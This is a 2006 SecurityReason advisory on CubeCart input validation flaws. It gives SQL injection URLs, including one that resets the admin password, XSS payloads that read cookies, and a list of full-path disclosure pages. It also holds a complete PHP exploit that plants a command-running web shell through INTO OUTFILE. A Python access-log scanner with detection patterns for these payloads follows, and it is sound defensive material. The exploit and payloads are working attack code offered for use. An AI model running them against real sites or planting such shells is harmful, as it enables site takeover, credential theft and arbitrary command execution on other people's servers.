SecurityReason.com - Our Reason is Security

Topic : CubeCart Multiple input Validation vulnerabilities

SecurityAlert : 1662
CVE : CVE-2006-5109
CVE : CVE-2006-5108
CVE : CVE-2006-5107
SecurityRisk : Medium
Remote Exploit : Yes
Local Exploit : No
Exploit Available : Yes
Credit : HACKERS PAL
Published : 03.10.2006

Affected Software : CubeCart

Advisory Content :

Hello,

CubeCart Multiple input Validation vulnerabilities

Discovered By : HACKERS PAL

Copyright : HACKERS PAL

Website : http://www.soqor.net

Email Address : security (at) soqor (dot) net

SQL injection

admin/forgot_pass.php?submit=1&user_name=-1'or%201=1/*

It will reset the password for the administrator.

--

admin/forgot_pass.php?submit=1&user_name=-1'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*

--

view_order.php?order_id='%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*

--

view_doc.php?view_doc=-1'%20union%20select%201,2/*

--

admin/print_order.php?order_id='%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*

/***************************************/

XSS

admin/print_order.php?order_id=<script>alert(document.cookie);</script>

--

view_order.php?order_id=<script>alert(document.cookie);</script>

--

admin/nav.php?site_url="><script>alert(document.cookie);</script><noscript>

admin/nav.php?la_search_home=<script>alert(document.cookie);</script>

and language variables for this file ..

--

admin/image.php?image=<script>alert(document.cookie);</script>

--

admin/header.inc.php?site_name=</title><script>alert(document.cookie);</script>

admin/header.inc.php?la_adm_header=</title><script>alert(document.cookie);</script>

admin/header.inc.php?charset='><script>alert(document.cookie);</script>

and all other variables in this file

--

footer.inc.php?la_pow_by=<script>alert(document.cookie);</script>

--

header.inc.php?site_name=</title><script>alert(document.cookie);</script>

and all other variables in the file.

--

/***************************************/

Full path

information.php

language.php

link_navi.php?cat_id=1

list_docs.php

popular_prod.php

sale.php

check_sum.php

spotlight.php

cat_navi.php

/***************************************/

Exploit :-

#!/usr/bin/php -q -d short_open_tag=on

<?

/*

/* CubeCart Remote sql injection exploit

/* By : HACKERS PAL

/* WwW.SoQoR.NeT

/*

/* Tested on CubeCart 2.0.X and maybe other versions are injected

*/

print_r('

/**********************************************/

/* CubeCart Remote sql injection exploit */

/* by HACKERS PAL <security (at) soqor (dot) net [email concealed]>
*/

/* site: http://www.soqor.net */');

if ($argc<2) {

print_r('

/* -- */

/* Usage: php '.$argv[0].' host

/* Example: */

/* php '.$argv[0].' http://localhost/CubeCart/

/**********************************************/

');

die;

}

error_reporting(0);

ini_set("max_execution_time",0);

ini_set("default_socket_timeout",5);

$url=$argv[1];

$exploit1="/cat_navi.php";

Function get_page($url)

{

if(function_exists("file_get_contents"))

{

$contents = file_get_contents($url);

}

else

{

$fp=fopen("$url","r");

while($line=fread($fp,1024))

{

$contents=$contents.$line;

}

}

return $contents;

}

$page = get_page($url.$exploit1);

$pa=explode("<b>",$page);

$pa=explode("</b>",$pa[2]);

$path = str_replace("cat_navi.php","",$pa[0])."soqor.php";

$var=' ';

$var = str_replace(" ","",$var);

$path = str_replace($var,"/",$path);

$exploit2="/view_doc.php?view_doc=-1'%20union%20select%20'<?php%20system
(".'$_GET[cmd]'.");%20?>','WwW.SoQoR.NeT'%20INTO%20OUTFILE%20'$path'%20f
rom%20store_docs/*";

$page_now = get_page($url.$exploit2);

if(ereg("mysql_fetch_array()",$page_now))

{

$newurl=$url."/soqor.php?cmd=id";

Echo "n[+] Go TO ".str_replace("//","/",$newurl)."n[+] Change id to any
command you want :)";

}

else

{

Echo "n[-] Exploit Faild";

}

Die("n/* Visit us : WwW.SoQoR.NeT
*/n/**********************************************/");

?>

#WwW.SoQoR.NeT
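
A defender-side check for the request patterns listed in this advisory, as an added example that is not part of the original advisory or of CubeCart: it scans web access-log lines for non-numeric values in the id parameters, SQL injection and script markup in any parameter, and direct requests to `.inc.php` include files. The log format, the sample lines, the label names and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line as it appears in a Common Log Format entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Parameters the advisory shows being abused that should only ever hold a record id.
ID_PARAMS = {"order_id", "view_doc"}
SQLI = re.compile(r"\bunion\b.+\bselect\b|\binto\s+outfile\b|'\s*or\s+\d+\s*=\s*\d+",
                  re.I | re.S)
XSS = re.compile(r"<\s*/?\s*(script|title|noscript)\b", re.I)

def classify(target):
    """Return sorted labels for one request target (path plus query string)."""
    parts = urlsplit(target)
    labels = set()
    # Include files such as header.inc.php are never a legitimate entry point.
    if parts.path.lower().endswith(".inc.php"):
        labels.add("direct-include")
    # parse_qsl percent-decodes values, so %20 and %3C are matched as text.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in ID_PARAMS and not re.fullmatch(r"\d+", value):
            labels.add("non-numeric-id")
        if SQLI.search(value):
            labels.add("sqli")
        if XSS.search(value):
            labels.add("xss")
    return sorted(labels)

def scan(lines):
    """Return (line_number, labels) for every log line that matches a rule."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        labels = classify(match.group(1)) if match else []
        if labels:
            hits.append((number, labels))
    return hits

def _line(target):
    # Constructed sample entry; address and timestamp are placeholders.
    return f'203.0.113.7 - - [03/Oct/2006:12:00:00 +0000] "GET {target} HTTP/1.0" 200 512'

SAMPLE_LOG = [_line(t) for t in (
    "/view_order.php?order_id=1042",
    "/view_doc.php?view_doc=-1'%20union%20select%201,2/*",
    "/admin/forgot_pass.php?submit=1&user_name=-1'or%201=1/*",
    "/admin/header.inc.php?site_name=%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E",
    "/view_order.php?order_id=%3Cscript%3Ealert(1)%3C/script%3E",
)]

if __name__ == "__main__":
    for number, labels in scan(SAMPLE_LOG):
        print(number, ", ".join(labels))
```

The `non-numeric-id` rule is the one to carry over into the application itself: rejecting any `order_id` or `view_doc` value that is not all digits closes both the injection and the reflected-markup cases for those parameters.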




